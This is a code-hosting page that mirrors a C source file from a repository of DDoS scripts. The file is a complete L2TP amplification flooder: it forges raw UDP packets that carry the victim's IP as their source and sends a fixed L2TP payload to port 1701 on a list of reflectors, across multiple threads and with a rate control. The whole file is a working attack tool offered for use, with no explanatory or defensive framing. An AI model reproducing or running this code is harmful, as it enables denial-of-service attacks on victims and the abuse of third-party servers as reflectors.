Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/DDOS Scripts/AMP Methods/L2TP Amplification/1701.c
4607 views
1
/*  	L2TP */

2


3
#include <time.h>

4
#include <pthread.h>

5
#include <unistd.h>

6
#include <stdio.h>

7
#include <stdlib.h>

8
#include <string.h>

9
#include <sys/socket.h>

10
#include <netinet/ip.h>

11
#include <netinet/udp.h>

12
#include <arpa/inet.h>

13
#define MAX_PACKET_SIZE 8192

14
#define PHI 0x9e3779b9

15
static uint32_t Q[4096], c = 362436;

16
struct list

17
{

18
	struct sockaddr_in data;

19
	struct list *next;

20
	struct list *prev;

21
};

22
struct list *head;

23
volatile int tehport;

24
volatile int limiter;

25
volatile unsigned int pps;

26
volatile unsigned int sleeptime = 100;

27
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };

28
void init_rand(uint32_t x)

29
{

30
	int i;

31
	Q[0] = x;

32
	Q[1] = x + PHI;

33
	Q[2] = x + PHI + PHI;

34
	for (i = 3; i < 4096; i++)

35
	{

36
	Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;

37
	}

38
}

39
uint32_t rand_cmwc(void)

40
{

41
	uint64_t t, a = 18782LL;

42
	static uint32_t i = 4095;

43
	uint32_t x, r = 0xfffffffe;

44
	i = (i + 1) & 4095;

45
	t = a * Q[i] + c;

46
	c = (t >> 32);

47
	x = t + c;

48
	if (x < c) {

49
	x++;

50
	c++;

51
	}

52
	return (Q[i] = r - x);

53
}

54
unsigned short csum (unsigned short *buf, int nwords)

55
{

56
	unsigned long sum = 0;

57
	for (sum = 0; nwords > 0; nwords--)

58
	sum += *buf++;

59
	sum = (sum >> 16) + (sum & 0xffff);

60
	sum += (sum >> 16);

61
	return (unsigned short)(~sum);

62
}

63
void setup_ip_header(struct iphdr *iph)

64
{

65
	iph->ihl = 5;

66
	iph->version = 4;

67
	iph->tos = 0;

68
	iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 74;

69
	iph->id = htonl(54321);

70
	iph->frag_off = 0;

71
	iph->ttl = MAXTTL;

72
	iph->protocol = IPPROTO_UDP;

73
	iph->check = 0;

74
	iph->saddr = inet_addr("192.168.3.100");

75
}

76
void setup_udp_header(struct udphdr *udph)

77
{

78
	udph->source = htons(5678);

79
	udph->dest = htons(1701);

80
	udph->check = 0;

81
	memcpy((void *)udph + sizeof(struct udphdr), "\xc8\x02\x00\x4c\x00\x00\x00\x00\x00\x00\x00\x00\x80\x08\x00\x00\x00\x00\x00\x01\x80\x08\x00\x00\x00\x02\x01\x00\x80\x0a\x00\x00\x00\x03\x00\x00\x00\x03\x80\x0a\x00\x00\x00\x04\x00\x00\x00\x00\x80\x0c\x00\x00\x00\x07\x74\x65\x73\x74\x80\x08\x00\x00\x00\x08\x2a\x2a\x80\x08\x00\x00\x00\x0a\x00\x04", 74);

82
	udph->len=htons(sizeof(struct udphdr) + 74);

83
}

84
void *flood(void *par1)

85
{

86
	struct thread_data *td = (struct thread_data *)par1;

87
	char datagram[MAX_PACKET_SIZE];

88
	struct iphdr *iph = (struct iphdr *)datagram;

89
	struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);

90
	struct sockaddr_in sin = td->sin;

91
	struct  list *list_node = td->list_node;

92
	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);

93
	if(s < 0){

94
	fprintf(stderr, "Could not open raw socket.\n");

95
	exit(-1);

96
	}

97
	init_rand(time(NULL));

98
	memset(datagram, 0, MAX_PACKET_SIZE);

99
	setup_ip_header(iph);

100
	setup_udp_header(udph);

101
	udph->source = htons(rand() % 65535 - 1026);

102
	iph->saddr = sin.sin_addr.s_addr;

103
	iph->daddr = list_node->data.sin_addr.s_addr;

104
	iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);

105
	int tmp = 1;

106
	const int *val = &tmp;

107
	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){

108
	fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");

109
	exit(-1);

110
	}

111
	init_rand(time(NULL));

112
	register unsigned int i;

113
	i = 0;

114
	while(1){

115
		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));

116
		list_node = list_node->next;

117
		iph->daddr = list_node->data.sin_addr.s_addr;

118
		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);

119
		iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);

120
		

121
		pps++;

122
		if(i >= limiter)

123
		{

124
			i = 0;

125
			usleep(sleeptime);

126
		}

127
		i++;

128
	}

129
}

130
int main(int argc, char *argv[ ])

131
{

132
	if(argc < 6){

133
	fprintf(stderr, "Invalid parameters!\n");

134
	fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);

135
		exit(-1);

136
	}

137
	srand(time(NULL));

138
	int i = 0;

139
	head = NULL;

140
	fprintf(stdout, "Setting up sockets...\n");

141
	int max_len = 128;

142
	char *buffer = (char *) malloc(max_len);

143
	buffer = memset(buffer, 0x00, max_len);

144
	int num_threads = atoi(argv[4]);

145
	int maxpps = atoi(argv[5]);

146
	limiter = 0;

147
	pps = 0;

148
	int multiplier = 20;

149
	FILE *list_fd = fopen(argv[3],  "r");

150
	while (fgets(buffer, max_len, list_fd) != NULL) {

151
		if ((buffer[strlen(buffer) - 1] == '\n') ||

152
				(buffer[strlen(buffer) - 1] == '\r')) {

153
			buffer[strlen(buffer) - 1] = 0x00;

154
			if(head == NULL)

155
			{

156
				head = (struct list *)malloc(sizeof(struct list));

157
				bzero(&head->data, sizeof(head->data));

158
				head->data.sin_addr.s_addr=inet_addr(buffer);

159
				head->next = head;

160
				head->prev = head;

161
			} else {

162
				struct list *new_node = (struct list *)malloc(sizeof(struct list));

163
				memset(new_node, 0x00, sizeof(struct list));

164
				new_node->data.sin_addr.s_addr=inet_addr(buffer);

165
				new_node->prev = head;

166
				new_node->next = head->next;

167
				head->next = new_node;

168
			}

169
			i++;

170
		} else {

171
			continue;

172
		}

173
	}

174
	struct list *current = head->next;

175
	pthread_t thread[num_threads];

176
	struct sockaddr_in sin;

177
	sin.sin_family = AF_INET;

178
	sin.sin_addr.s_addr = inet_addr(argv[1]);

179
	struct thread_data td[num_threads];

180
	for(i = 0;i<num_threads;i++){

181
		td[i].thread_id = i;

182
		td[i].sin= sin;

183
		td[i].list_node = current;

184
		pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);

185
	}

186
	fprintf(stdout, "Starting flood...\n");

187
	for(i = 0;i<(atoi(argv[6])*multiplier);i++)

188
	{

189
		usleep((1000/multiplier)*1000);

190
		if((pps*multiplier) > maxpps)

191
		{

192
			if(1 > limiter)

193
			{

194
				sleeptime+=100;

195
			} else {

196
				limiter--;

197
			}

198
		} else {

199
			limiter++;

200
			if(sleeptime > 25)

201
			{

202
				sleeptime-=25;

203
			} else {

204
				sleeptime = 0;

205
			}

206
		}

207
		pps = 0;

208
	}

209
	return 0;

210
}

211